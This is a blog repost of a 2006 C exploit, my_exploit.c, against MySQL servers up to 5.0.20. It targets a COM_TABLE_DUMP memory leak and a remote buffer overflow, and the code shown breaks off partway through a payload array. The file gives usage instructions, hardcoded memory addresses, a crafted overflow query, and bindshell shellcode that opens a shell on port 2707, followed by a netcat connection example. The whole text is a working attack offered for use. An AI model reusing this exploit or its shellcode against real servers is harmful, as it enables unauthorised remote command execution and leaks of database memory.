mysql com table dump_MySQL COM_TABLE_DUMP Information Leakage and Arbitrary Command Execution

最新推荐文章于 2022-06-01 19:46:37 发布

weixin_39581945

最新推荐文章于 2022-06-01 19:46:37 发布

阅读量194

点赞数

文章标签： mysql com table dump

本文链接：https://blog.csdn.net/weixin_39581945/article/details/113433671

版权

/* ****************************************************************

April 21.st 2006

my_exploit.c

MySql COM_TABLE_DUMP Memory Leak & MySql remote B0f

MySql <= 5.0.20

MySql COM_TABLE_DUMP Memory Leak

MySql <= 4.x.x

GPL 2.0

****************************************************************

Disclaimer:

In no event shall the author be liable for any damages

whatsoever arising out of or in connection with the use

or spread of this information.

Any use of this information is at the user's own risk.

****************************************************************

compile with:

gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c

-Lmysql-5.0.20/lib/mysql/ -lmysqlclient -o my_exploit

Then:

my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s

socket]|[-h host][-p port]][-x]

-H: this Help;

-i: Information leak exploit (shows the content of MySql Server Memory)

-x: shows c/s communication output in hexadecimal

-t: hexadecimal table_list struct address (by default we try to find it

automatically)

-a: hexadecimal thread struct address (look at the error log to see

something like: thd=0x8b1b338)

-u: mysql username (anonymous too ;)

-p: mysql userpass (if you need it)

-s: the socket path if is a unix socket

-h: hostname or IP address

-P: port (default 3306)

Example_1 - Memoryleak: my_exploit -s socketpath -u username -i

Example_2 - Remote Shell: my_exploit -h 127.0.0.1 -u username -a

0x8b1f468

For memory leak:

my_exploit -i [-u user] [-p password] [-s socket|[-h hostname [-P

port]]]

For the bindshell to port 2707

my_exploit [-t 0xtableaddress] [-a 0xthdaddress] [-u user] [-p password]

[-s socket|[-h hostname [-P port]]]

then from another shell:

nc 127.0.0.1 2707

uid=78(mysql) gid=78(mysql) groups=78(mysql)

#include <stdio.h>

#include <mysql.h>

#include <unistd.h>

// we need to know the thread struct address pointer and the table_list.

// these are defaults, change them from command line.

int thd = 0x8b1b338;

int tbl = 0x8b3a880;

#define USOCK2 "/tmp/mysql.sock"

char addr_tdh[4];

char addr_tbl[4];

char addr_ret[4];

// constants to overwrite packet with addresses for table_list thread and

our shell.

#define TBL_POS 182

#define THD_POS 178

#define RET_POS 174

#define SHL_POS 34

// bindshell spawns a shell with on port 2707

char shcode[] = {

0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89

// 12

,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1

,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80

,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0

,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80

,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f

,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80

// 12*7= 84

};

int tmp_idx = 0;

int dump_packet_len = 7;

char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 };

int payload_len = 371;

// header packet + select '1234567890...etc'

char query_payload[] = {

0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74,

0x20, 0x27, 0x31, 0x32, 0x33 // 16 Some junk from position 6 ...

, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31,

0x32, 0x33, 0x34, 0x35, 0x36 // 32

, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34,

0x35, 0x36, 0x37, 0x38, 0x39 // 48

, 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,

0x38, 0x39, 0x30, 0x5f, 0x34 // 64

, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30,

0x5f, 0x35, 0x5f, 0x31, 0x32 // 72

, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f,

0x31, 0x32, 0x33, 0x34, 0x35 // 88

, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33,

0x34, 0x35, 0x36, 0x37, 0x38 // 94

, 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36,

0x37, 0x38, 0x39, 0x30, 0x6a // 112

, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f,

0x2f, 0x62, 0x69, 0x89, 0xe3 // 128 endsh 118

, 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46,

0x47, 0x48, 0x49, 0x4c, 0x4d // 144

, 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f,

0x61, 0x61, 0x62, 0x62, 0x63 // 160

, 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf,

0xa0, 0xe9, 0x6c, 0xbf, 0x6d // 176

, 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72,

0x73, 0x73, 0x74, 0x74, 0x75 // 192 178

, 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d,

0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 208